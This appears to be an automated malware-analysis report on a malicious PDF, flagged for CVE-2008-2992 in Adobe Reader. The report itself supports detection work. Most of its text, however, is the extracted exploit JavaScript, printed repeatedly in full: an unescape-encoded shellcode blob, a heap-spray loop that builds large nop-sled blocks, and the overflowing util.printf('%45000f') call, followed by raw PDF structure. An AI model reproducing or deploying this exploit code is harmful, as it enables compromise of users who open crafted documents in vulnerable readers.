MALICIOUS
268
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.007 JavaScript
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as suggested by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' in the static triage. The primary function of the script appears to be malicious code execution, likely to download and run a second-stage payload. The obfuscation makes it difficult to determine the exact payload or final destination without further dynamic analysis.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 7
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913" + -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTHA PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x3DC | 2786 bytes |
SHA-256: 1c31029338160b87111293037d0ea062593781a532a4d143ff0b66a763749956 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913" +
"%uA7FE%u838B%uFCEB%uF4E2%uEEE2%uC1FD%u373A%u32C1" +
"%uFF35%uBF27%u6703%u7145%uFBE2%u604F%u01F6%uFB58" +
"%u6745%u123E%u03CA%u229F%u6790%u993E%u6BD0%u62B5" +
"%uCA8C%u52B5%uEC98%u99E6%u5BE3%u66B5%u1F8E%uE13D" +
"%u191B%u111E%uEC6B%u0670%u8AA3%u4568%uECC1%u1101" +
"%uEC6B%u78CC%u3E9E%uB4CD%u6FE4%u4D67%uA013%u573A" +
"%u8E72%u4D67%uECCE%u99F3%u43D6%uD13D%u8641%uD33D" +
"%uAEA3%u9958%uEC98%u0E78%uA493%uF3FF%u6492%u99FF" +
"%u6490%u99FD%uEC6A%u91C9%u6956%uC2B5%u63FA%uFA67" +
"%u67C0%u123E%uA113%u4033%u98C6%uEE69%uECCA%u78E6" +
"%u3E91%u2FD6%u6790%u913E%u7456%u5468%u5910%u67BE" +
"%uE76A%u9208%uE4CE%u32D2%uBB1B%u3254%u98C3%uFE69" +
"%u6357%u4E3D%u49F1%uD55B%u64D4%u6A3A%u67F5%u213E" +
"%u3750%u416E%u37C6%u45C1%uEC6C%u42E2%u98C3%uE269" +
"%u98C0%uE669%uA7A3%u9792%u1250%u43C7%u31C2%uED6D" +
"%u3D42%uB967%u8972%uD20D%u8F53%uED18%u986F%u7779" +
"%u37E4%u7D4C%u26F3%u765A%u02E2%u614D%u2090%u665B" +
"%u1EC3%u664D%u0AF5%u7B7A%u02E2%u665D%u15FF%u5347" +
"%u3090%u7C57%u1FD5%u715B%u2290%u7B46%u33E4%u6056" +
"%u06F5%u125A%u08DC%u765F%u0EDC%u605C%u15F1%u5347" +
"%u1290%u7E4C%u08FD%u1250%u35C5%u5672%u10FF%u7E50" +
"%u06FF%u465A%u21FF%u7E57%u26F5%uE33E%u8A7D%uB1D7" +
"%uD126%uF8CE%u8D79%uEED1%u9A67%uF9C8%u9D27%uE6C8" +
"%u9826%uE7CE%uCD6C%uEE89%u9B71%u8B27");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
|
|||
javascript_obj0013_002.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x402 | 3422 bytes |
SHA-256: b07fc13de81ecb2edeb807f4d646074c1c8a93e1e9b4b69bcbf520d9d38ca356 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913" +
"%uA7FE%u838B%uFCEB%uF4E2%uEEE2%uC1FD%u373A%u32C1" +
"%uFF35%uBF27%u6703%u7145%uFBE2%u604F%u01F6%uFB58" +
"%u6745%u123E%u03CA%u229F%u6790%u993E%u6BD0%u62B5" +
"%uCA8C%u52B5%uEC98%u99E6%u5BE3%u66B5%u1F8E%uE13D" +
"%u191B%u111E%uEC6B%u0670%u8AA3%u4568%uECC1%u1101" +
"%uEC6B%u78CC%u3E9E%uB4CD%u6FE4%u4D67%uA013%u573A" +
"%u8E72%u4D67%uECCE%u99F3%u43D6%uD13D%u8641%uD33D" +
"%uAEA3%u9958%uEC98%u0E78%uA493%uF3FF%u6492%u99FF" +
"%u6490%u99FD%uEC6A%u91C9%u6956%uC2B5%u63FA%uFA67" +
"%u67C0%u123E%uA113%u4033%u98C6%uEE69%uECCA%u78E6" +
"%u3E91%u2FD6%u6790%u913E%u7456%u5468%u5910%u67BE" +
"%uE76A%u9208%uE4CE%u32D2%uBB1B%u3254%u98C3%uFE69" +
"%u6357%u4E3D%u49F1%uD55B%u64D4%u6A3A%u67F5%u213E" +
"%u3750%u416E%u37C6%u45C1%uEC6C%u42E2%u98C3%uE269" +
"%u98C0%uE669%uA7A3%u9792%u1250%u43C7%u31C2%uED6D" +
"%u3D42%uB967%u8972%uD20D%u8F53%uED18%u986F%u7779" +
"%u37E4%u7D4C%u26F3%u765A%u02E2%u614D%u2090%u665B" +
"%u1EC3%u664D%u0AF5%u7B7A%u02E2%u665D%u15FF%u5347" +
"%u3090%u7C57%u1FD5%u715B%u2290%u7B46%u33E4%u6056" +
"%u06F5%u125A%u08DC%u765F%u0EDC%u605C%u15F1%u5347" +
"%u1290%u7E4C%u08FD%u1250%u35C5%u5672%u10FF%u7E50" +
"%u06FF%u465A%u21FF%u7E57%u26F5%uE33E%u8A7D%uB1D7" +
"%uD126%uF8CE%u8D79%uEED1%u9A67%uF9C8%u9D27%uE6C8" +
"%u9826%uE7CE%uCD6C%uEE89%u9B71%u8B27");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3DC | 2033 bytes |
SHA-256: 324abf0e537ca3d977f7bfbcb851b6037419279fc59cb7d1cde5984c02406ddd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913%uA7FE%u838B%uFCEB%uF4E2%uEEE2%uC1FD%u373A%u32C1%uFF35%uBF27%u6703%u7145%uFBE2%u604F%u01F6%uFB58%u6745%u123E%u03CA%u229F%u6790%u993E%u6BD0%u62B5%uCA8C%u52B5%uEC98%u99E6%u5BE3%u66B5%u1F8E%uE13D%u191B%u111E%uEC6B%u0670%u8AA3%u4568%uECC1%u1101%uEC6B%u78CC%u3E9E%uB4CD%u6FE4%u4D67%uA013%u573A%u8E72%u4D67%uECCE%u99F3%u43D6%uD13D%u8641%uD33D%uAEA3%u9958%uEC98%u0E78%uA493%uF3FF%u6492%u99FF%u6490%u99FD%uEC6A%u91C9%u6956%uC2B5%u63FA%uFA67%u67C0%u123E%uA113%u4033%u98C6%uEE69%uECCA%u78E6%u3E91%u2FD6%u6790%u913E%u7456%u5468%u5910%u67BE%uE76A%u9208%uE4CE%u32D2%uBB1B%u3254%u98C3%uFE69%u6357%u4E3D%u49F1%uD55B%u64D4%u6A3A%u67F5%u213E%u3750%u416E%u37C6%u45C1%uEC6C%u42E2%u98C3%uE269%u98C0%uE669%uA7A3%u9792%u1250%u43C7%u31C2%uED6D%u3D42%uB967%u8972%uD20D%u8F53%uED18%u986F%u7779%u37E4%u7D4C%u26F3%u765A%u02E2%u614D%u2090%u665B%u1EC3%u664D%u0AF5%u7B7A%u02E2%u665D%u15FF%u5347%u3090%u7C57%u1FD5%u715B%u2290%u7B46%u33E4%u6056%u06F5%u125A%u08DC%u765F%u0EDC%u605C%u15F1%u5347%u1290%u7E4C%u08FD%u1250%u35C5%u5672%u10FF%u7E50%u06FF%u465A%u21FF%u7E57%u26F5%uE33E%u8A7D%uB1D7%uD126%uF8CE%u8D79%uEED1%u9A67%uF9C8%u9D27%uE6C8%u9826%uE7CE%uCD6C%uEE89%u9B71%u8B27");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x402 | 2669 bytes |
SHA-256: e3e614ceafd4b0bd40a6f56a1b6dd501880460ac91060cc1f990d1aa4179c2e8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913%uA7FE%u838B%uFCEB%uF4E2%uEEE2%uC1FD%u373A%u32C1%uFF35%uBF27%u6703%u7145%uFBE2%u604F%u01F6%uFB58%u6745%u123E%u03CA%u229F%u6790%u993E%u6BD0%u62B5%uCA8C%u52B5%uEC98%u99E6%u5BE3%u66B5%u1F8E%uE13D%u191B%u111E%uEC6B%u0670%u8AA3%u4568%uECC1%u1101%uEC6B%u78CC%u3E9E%uB4CD%u6FE4%u4D67%uA013%u573A%u8E72%u4D67%uECCE%u99F3%u43D6%uD13D%u8641%uD33D%uAEA3%u9958%uEC98%u0E78%uA493%uF3FF%u6492%u99FF%u6490%u99FD%uEC6A%u91C9%u6956%uC2B5%u63FA%uFA67%u67C0%u123E%uA113%u4033%u98C6%uEE69%uECCA%u78E6%u3E91%u2FD6%u6790%u913E%u7456%u5468%u5910%u67BE%uE76A%u9208%uE4CE%u32D2%uBB1B%u3254%u98C3%uFE69%u6357%u4E3D%u49F1%uD55B%u64D4%u6A3A%u67F5%u213E%u3750%u416E%u37C6%u45C1%uEC6C%u42E2%u98C3%uE269%u98C0%uE669%uA7A3%u9792%u1250%u43C7%u31C2%uED6D%u3D42%uB967%u8972%uD20D%u8F53%uED18%u986F%u7779%u37E4%u7D4C%u26F3%u765A%u02E2%u614D%u2090%u665B%u1EC3%u664D%u0AF5%u7B7A%u02E2%u665D%u15FF%u5347%u3090%u7C57%u1FD5%u715B%u2290%u7B46%u33E4%u6056%u06F5%u125A%u08DC%u765F%u0EDC%u605C%u15F1%u5347%u1290%u7E4C%u08FD%u1250%u35C5%u5672%u10FF%u7E50%u06FF%u465A%u21FF%u7E57%u26F5%uE33E%u8A7D%uB1D7%uD126%uF8CE%u8D79%uEED1%u9A67%uF9C8%u9D27%uE6C8%u9826%uE7CE%uCD6C%uEE89%u9B71%u8B27");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_002.js |
deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x11 | 4723 bytes |
SHA-256: 3202e360945e0bc6f6431a0f1762d24c0a16bfab07f63dabc5b90ae2ed46c2c7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913%uA7FE%u838B%uFCEB%uF4E2%uEEE2%uC1FD%u373A%u32C1%uFF35%uBF27%u6703%u7145%uFBE2%u604F%u01F6%uFB58%u6745%u123E%u03CA%u229F%u6790%u993E%u6BD0%u62B5%uCA8C%u52B5%uEC98%u99E6%u5BE3%u66B5%u1F8E%uE13D%u191B%u111E%uEC6B%u0670%u8AA3%u4568%uECC1%u1101%uEC6B%u78CC%u3E9E%uB4CD%u6FE4%u4D67%uA013%u573A%u8E72%u4D67%uECCE%u99F3%u43D6%uD13D%u8641%uD33D%uAEA3%u9958%uEC98%u0E78%uA493%uF3FF%u6492%u99FF%u6490%u99FD%uEC6A%u91C9%u6956%uC2B5%u63FA%uFA67%u67C0%u123E%uA113%u4033%u98C6%uEE69%uECCA%u78E6%u3E91%u2FD6%u6790%u913E%u7456%u5468%u5910%u67BE%uE76A%u9208%uE4CE%u32D2%uBB1B%u3254%u98C3%uFE69%u6357%u4E3D%u49F1%uD55B%u64D4%u6A3A%u67F5%u213E%u3750%u416E%u37C6%u45C1%uEC6C%u42E2%u98C3%uE269%u98C0%uE669%uA7A3%u9792%u1250%u43C7%u31C2%uED6D%u3D42%uB967%u8972%uD20D%u8F53%uED18%u986F%u7779%u37E4%u7D4C%u26F3%u765A%u02E2%u614D%u2090%u665B%u1EC3%u664D%u0AF5%u7B7A%u02E2%u665D%u15FF%u5347%u3090%u7C57%u1FD5%u715B%u2290%u7B46%u33E4%u6056%u06F5%u125A%u08DC%u765F%u0EDC%u605C%u15F1%u5347%u1290%u7E4C%u08FD%u1250%u35C5%u5672%u10FF%u7E50%u06FF%u465A%u21FF%u7E57%u26F5%uE33E%u8A7D%uB1D7%uD126%uF8CE%u8D79%uEED1%u9A67%uF9C8%u9D27%uE6C8%u9826%uE7CE%uCD6C%uEE89%u9B71%u8B27");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913%uA7FE%u838B%uFCEB%uF4E2%uEEE2%uC1FD%u373A%u32C1%uFF35%uBF27%u6703%u7145%uFBE2%u604F%u01F6%uFB58%u6745%u123E%u03CA%u229F%u6790%u993E%u6BD0%u62B5%uCA8C%u52B5%uEC98%u99E6%u5BE3%u66B5%u1F8E%uE13D%u191B%u111E%uEC6B%u0670%u8AA3%u4568%uECC1%u1101%uEC6B%u78CC%u3E9E%uB4CD%u6FE4%u4D67%uA013%u573A%u8E72%u4D67%uECCE%u99F3%u43D6%uD13D%u8641%uD33D%uAEA3%u9958%uEC98%u0E78%uA493%uF3FF%u6492%u99FF%u6490%u99FD%uEC6A%u91C9%u6956%uC2B5%u63FA%uFA67%u67C0%u123E%uA113%u4033%u98C6%uEE69%uECCA%u78E6%u3E91%u2FD6%u6790%u913E%u7456%u5468%u5910%u67BE%uE76A%u9208%uE4CE%u32D2%uBB1B%u3254%u98C3%uFE69%u6357%u4E3D%u49F1%uD55B%u64D4%u6A3A%u67F5%u213E%u3750%u416E%u37C6%u45C1%uEC6C%u42E2%u98C3%uE269%u98C0%uE669%uA7A3%u9792%u1250%u43C7%u31C2%uED6D%u3D42%uB967%u8972%uD20D%u8F53%uED18%u986F%u7779%u37E4%u7D4C%u26F3%u765A%u02E2%u614D%u2090%u665B%u1EC3%u664D%u0AF5%u7B7A%u02E2%u665D%u15FF%u5347%u3090%u7C57%u1FD5%u715B%u2290%u7B46%u33E4%u6056%u06F5%u125A%u08DC%u765F%u0EDC%u605C%u15F1%u5347%u1290%u7E4C%u08FD%u1250%u35C5%u5672%u10FF%u7E50%u06FF%u465A%u21FF%u7E57%u26F5%uE33E%u8A7D%uB1D7%uD126%uF8CE%u8D79%uEED1%u9A67%uF9C8%u9D27%uE6C8%u9826%uE7CE%uCD6C%uEE89%u9B71%u8B27");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0x11 | 6229 bytes |
SHA-256: c0b842a503c1990f265df63d02a7f076affd0952d4d3df447f9553e34beb06ac |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913" +
"%uA7FE%u838B%uFCEB%uF4E2%uEEE2%uC1FD%u373A%u32C1" +
"%uFF35%uBF27%u6703%u7145%uFBE2%u604F%u01F6%uFB58" +
"%u6745%u123E%u03CA%u229F%u6790%u993E%u6BD0%u62B5" +
"%uCA8C%u52B5%uEC98%u99E6%u5BE3%u66B5%u1F8E%uE13D" +
"%u191B%u111E%uEC6B%u0670%u8AA3%u4568%uECC1%u1101" +
"%uEC6B%u78CC%u3E9E%uB4CD%u6FE4%u4D67%uA013%u573A" +
"%u8E72%u4D67%uECCE%u99F3%u43D6%uD13D%u8641%uD33D" +
"%uAEA3%u9958%uEC98%u0E78%uA493%uF3FF%u6492%u99FF" +
"%u6490%u99FD%uEC6A%u91C9%u6956%uC2B5%u63FA%uFA67" +
"%u67C0%u123E%uA113%u4033%u98C6%uEE69%uECCA%u78E6" +
"%u3E91%u2FD6%u6790%u913E%u7456%u5468%u5910%u67BE" +
"%uE76A%u9208%uE4CE%u32D2%uBB1B%u3254%u98C3%uFE69" +
"%u6357%u4E3D%u49F1%uD55B%u64D4%u6A3A%u67F5%u213E" +
"%u3750%u416E%u37C6%u45C1%uEC6C%u42E2%u98C3%uE269" +
"%u98C0%uE669%uA7A3%u9792%u1250%u43C7%u31C2%uED6D" +
"%u3D42%uB967%u8972%uD20D%u8F53%uED18%u986F%u7779" +
"%u37E4%u7D4C%u26F3%u765A%u02E2%u614D%u2090%u665B" +
"%u1EC3%u664D%u0AF5%u7B7A%u02E2%u665D%u15FF%u5347" +
"%u3090%u7C57%u1FD5%u715B%u2290%u7B46%u33E4%u6056" +
"%u06F5%u125A%u08DC%u765F%u0EDC%u605C%u15F1%u5347" +
"%u1290%u7E4C%u08FD%u1250%u35C5%u5672%u10FF%u7E50" +
"%u06FF%u465A%u21FF%u7E57%u26F5%uE33E%u8A7D%uB1D7" +
"%uD126%uF8CE%u8D79%uEED1%u9A67%uF9C8%u9D27%uE6C8" +
"%u9826%uE7CE%uCD6C%uEE89%u9B71%u8B27");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A3%uD9EE%u2474%u5BF4%u7381%u0913" +
"%uA7FE%u838B%uFCEB%uF4E2%uEEE2%uC1FD%u373A%u32C1" +
"%uFF35%uBF27%u6703%u7145%uFBE2%u604F%u01F6%uFB58" +
"%u6745%u123E%u03CA%u229F%u6790%u993E%u6BD0%u62B5" +
"%uCA8C%u52B5%uEC98%u99E6%u5BE3%u66B5%u1F8E%uE13D" +
"%u191B%u111E%uEC6B%u0670%u8AA3%u4568%uECC1%u1101" +
"%uEC6B%u78CC%u3E9E%uB4CD%u6FE4%u4D67%uA013%u573A" +
"%u8E72%u4D67%uECCE%u99F3%u43D6%uD13D%u8641%uD33D" +
"%uAEA3%u9958%uEC98%u0E78%uA493%uF3FF%u6492%u99FF" +
"%u6490%u99FD%uEC6A%u91C9%u6956%uC2B5%u63FA%uFA67" +
"%u67C0%u123E%uA113%u4033%u98C6%uEE69%uECCA%u78E6" +
"%u3E91%u2FD6%u6790%u913E%u7456%u5468%u5910%u67BE" +
"%uE76A%u9208%uE4CE%u32D2%uBB1B%u3254%u98C3%uFE69" +
"%u6357%u4E3D%u49F1%uD55B%u64D4%u6A3A%u67F5%u213E" +
"%u3750%u416E%u37C6%u45C1%uEC6C%u42E2%u98C3%uE269" +
"%u98C0%uE669%uA7A3%u9792%u1250%u43C7%u31C2%uED6D" +
"%u3D42%uB967%u8972%uD20D%u8F53%uED18%u986F%u7779" +
"%u37E4%u7D4C%u26F3%u765A%u02E2%u614D%u2090%u665B" +
